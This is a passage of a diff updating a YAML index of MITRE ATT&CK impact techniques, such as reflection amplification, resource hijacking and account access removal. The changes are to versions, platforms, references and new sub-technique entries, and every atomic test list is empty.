       - 'File: File Creation'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - root
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+      created: '2020-03-02T14:30:05.252Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/003
+        external_id: T1565.003
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1498.002:
     technique:
-      modified: '2023-03-30T21:01:41.052Z'
+      modified: '2024-10-15T16:04:34.495Z'
       name: Reflection Amplification
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
@@ -57113,6 +57888,7 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
         before the traffic volume is sufficient to cause impact to the availability
         of the service, but such response time typically requires very aggressive
@@ -57128,17 +57904,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Sensor Health: Host Status'
       - 'Network Traffic: Network Traffic Flow'
@@ -57148,14 +57919,15 @@ impact:
       id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
       created: '2020-03-02T20:08:03.691Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1498/002
         external_id: T1498.002
-      - source_name: Cloudflare ReflectionDoS May 2017
-        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
-          (attacks). Retrieved April 23, 2019.
-        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       - source_name: Cloudflare DNSamplficationDoS
         description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
           April 23, 2019.
@@ -57164,28 +57936,28 @@ impact:
         description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
           April 23, 2019.
         url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+      - source_name: Cloudflare ReflectionDoS May 2017
+        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+          (attacks). Retrieved April 23, 2019.
+        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cloudflare Memcrashed Feb 2018
+        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
       - source_name: Arbor AnnualDoSreport Jan 2018
         description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
           Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
           into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
           Infrastructure Security Report. Retrieved April 22, 2019.
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-      - source_name: Cloudflare Memcrashed Feb 2018
-        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
-          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
-        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
-      - source_name: Cisco DoSdetectNetflow
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1499.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:05:48.014Z'
       name: Service Exhaustion Flood
       description: |-
         Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -57196,7 +57968,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -57207,17 +57978,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -57254,7 +58020,8 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491:
     technique:
@@ -57275,7 +58042,7 @@ impact:
       - source_name: mitre-attack
         external_id: T1491
         url: https://attack.mitre.org/techniques/T1491
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:42.056Z'
       name: Defacement
       description: "Adversaries may modify visual content available internally or
         externally to an enterprise network, thus affecting the integrity of the original
@@ -57302,12 +58069,78 @@ impact:
       x_mitre_impact_type:
       - Integrity
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+    atomic_tests: []
+  T1496.002:
+    technique:
+      modified: '2024-09-25T14:59:35.287Z'
+      name: Bandwidth Hijacking
+      description: "Adversaries may leverage the network bandwidth resources of co-opted
+        systems to complete resource-intensive tasks, which may impact system and/or
+        hosted service availability. \n\nAdversaries may also use malware that leverages
+        a system's network bandwidth as part of a botnet in order to facilitate [Network
+        Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+        to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+        in proxyjacking by selling use of the victims' network bandwidth and IP address
+        to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+        in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+        Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+        financial costs or availability disruptions, this technique may cause reputational
+        damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+        Proxyjacking)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      - IaaS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'File: File Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Connection Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+      created: '2024-09-25T13:44:35.412Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/002
+        external_id: T1496.002
+      - source_name: Sysdig Proxyjacking
+        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+          Chat. Retrieved July 6, 2023.
+        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+      - source_name: Unit 42 Leaked Environment Variables 2024
+        description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+          Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+          Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+        url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+      - source_name: GoBotKR
+        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1657:
     technique:
-      modified: '2024-04-11T20:22:14.359Z'
+      modified: '2024-10-15T15:58:10.254Z'
       name: Financial Theft
       description: "Adversaries may steal monetary resources from targets through
         extortion, social engineering, technical theft, or other methods aimed at
@@ -57340,7 +58173,7 @@ impact:
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
       - Pawel Partyka, Microsoft Threat Intelligence
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -57350,10 +58183,9 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
@@ -57416,7 +58248,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1491.001:
     technique:
@@ -57457,7 +58288,7 @@ impact:
         messages. Since internally defacing systems exposes an adversary''s presence,
         it often takes place after other intrusion goals have been accomplished.(Citation:
         Novetta Blockbuster Destructive Malware)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-28T18:55:35.988Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Defacement: Internal Defacement'
       x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -57478,9 +58309,157 @@ impact:
       - Integrity
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1491.001
     atomic_tests: []
+  T1496.004:
+    technique:
+      modified: '2024-10-16T17:59:27.535Z'
+      name: Cloud Service Hijacking
+      description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+        applications to complete resource-intensive tasks, which may impact hosted
+        service availability. \n\nFor example, adversaries may leverage email and
+        messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+        Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+        spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+        messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+        2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+        in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+        AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+        2024)\n\nIn some cases, adversaries may leverage services that the victim
+        is already using. In others, particularly when the service is part of a larger
+        cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+        2024) Leveraging SaaS applications may cause the victim to incur significant
+        financial costs, use up service quotas, and otherwise impact availability. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+      created: '2024-09-25T14:05:59.910Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/004
+        external_id: T1496.004
+      - source_name: SentinelLabs SNS Sender 2024
+        description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+          Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+        url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+      - source_name: Lacework LLMJacking 2024
+        description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+          with Composite Alerts. Retrieved September 25, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+      - source_name: Sysdig LLMJacking 2024
+        description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+          (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+      - source_name: Permiso SES Abuse 2023
+        description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+          25, 2024.
+        url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.001:
+    technique:
+      modified: '2024-10-13T16:58:38.820Z'
+      name: Compute Hijacking
+      description: "Adversaries may leverage the compute resources of co-opted systems
+        to complete resource-intensive tasks, which may impact system and/or hosted
+        service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        is to validate transactions of cryptocurrency networks and earn virtual currency.
+        Adversaries may consume enough system resources to negatively impact and/or
+        cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+        Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+        because of the high potential for available resources, but user endpoint systems
+        may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+        environments may also be targeted due to the ease of deployment via exposed
+        APIs and the potential for scaling mining activities by deploying or compromising
+        multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+        Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+        cryptocurrency mining malware identify then kill off processes for competing
+        malware to ensure it’s not competing for resources.(Citation: Trend Micro
+        War of Crypto Miners)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Network Traffic: Network Connection Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Sensor Health: Host Status'
+      - 'Process: Process Creation'
+      - 'File: File Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+      created: '2024-09-25T13:34:30.100Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/001
+        external_id: T1496.001
+      - source_name: Unit 42 Hildegard Malware
+        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+      - source_name: CloudSploit - Unused AWS Regions
+        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+          Retrieved October 8, 2019.
+        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+          17, 2019.
+        url: https://securelist.com/lazarus-under-the-hood/77908/
+      - source_name: Trend Micro Exposed Docker APIs
+        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+          via Exposed APIs. Retrieved April 6, 2021.
+        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+      - source_name: Trend Micro War of Crypto Miners
+        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+          Miners: A Battle for Resources. Retrieved April 6, 2021.'
+        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1565:
     technique:
       modified: '2024-02-02T17:18:39.004Z'
@@ -57533,11 +58512,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1531:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:35:13.577Z'
       name: Account Access Removal
       description: "Adversaries may interrupt availability of system and network resources
         by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -57560,6 +58538,7 @@ impact:
         phase_name: impact
       x_mitre_contributors:
       - Hubert Mank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -57577,9 +58556,10 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      x_mitre_version: '1.2'
+      - IaaS
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -57605,9 +58585,8 @@ impact:
         url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1531
     atomic_tests: []
   T1486:
@@ -57694,7 +58673,7 @@ impact:
         NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
         compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
         Part 1)"
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T13:07:10.318Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data Encrypted for Impact
       x_mitre_detection: |-
@@ -57718,12 +58697,11 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1486
     atomic_tests: []
   T1499:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:56:47.424Z'
       name: Endpoint Denial of Service
       description: |
         Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -57742,7 +58720,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Alfredo Oliveira, Trend Micro
       - David Fiser, @anu4is, Trend Micro
@@ -57759,18 +58736,13 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.1'
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -57794,8 +58766,8 @@ impact:
       - source_name: FSISAC FraudNetDoS September 2012
         description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
           Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
       - source_name: ArsTechnica Great Firewall of China
         description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
           on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -57815,33 +58787,22 @@ impact:
         url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1496:
     technique:
-      modified: '2024-02-14T21:00:00.467Z'
+      modified: '2024-10-13T17:00:09.759Z'
       name: Resource Hijacking
       description: "Adversaries may leverage the resources of co-opted systems to
         complete resource-intensive tasks, which may impact system and/or hosted service
-        availability. \n\nOne common purpose for Resource Hijacking is to validate
-        transactions of cryptocurrency networks and earn virtual currency. Adversaries
-        may consume enough system resources to negatively impact and/or cause affected
-        machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
-        Blog 2017) Servers and cloud-based systems are common targets because of the
-        high potential for available resources, but user endpoint systems may also
-        be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
-        CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
-        due to the ease of deployment via exposed APIs and the potential for scaling
-        mining activities by deploying or compromising multiple containers within
-        an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
-        Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
-        malware identify then kill off processes for competing malware to ensure it’s
-        not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
-        may also use malware that leverages a system's network bandwidth as part of
-        a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
-        campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
-        they may engage in proxyjacking by selling use of the victims' network bandwidth
-        and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+        availability. \n\nResource hijacking may take a number of different forms.
+        For example, adversaries may:\n\n* Leverage compute resources in order to
+        mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+        SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+        quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+        types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+        2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -57852,7 +58813,7 @@ impact:
       - Magno Logan, @magnologan, Trend Micro
       - Vishwas Manral, McAfee
       - Yossi Weizman, Azure Defender Research Team
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Consider monitoring process resource usage to determine anomalous
         activity associated with malicious hijacking of computer resources such as
@@ -57869,8 +58830,11 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.5'
+      - SaaS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'File: File Creation'
@@ -57889,99 +58853,73 @@ impact:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1496
         external_id: T1496
-      - source_name: Unit 42 Hildegard Malware
-        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
-          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
-        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
-      - source_name: CloudSploit - Unused AWS Regions
-        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
-          Retrieved October 8, 2019.
-        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
-      - source_name: Sysdig Proxyjacking
-        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
-          Chat. Retrieved July 6, 2023.
-        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
-      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
-        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
-          17, 2019.
-        url: https://securelist.com/lazarus-under-the-hood/77908/
-      - source_name: Trend Micro Exposed Docker APIs
-        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
-          via Exposed APIs. Retrieved April 6, 2021.
-        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
-      - source_name: Trend Micro War of Crypto Miners
-        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
-          Miners: A Battle for Resources. Retrieved April 6, 2021.'
-        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
-      - source_name: GoBotKR
-        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
-          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
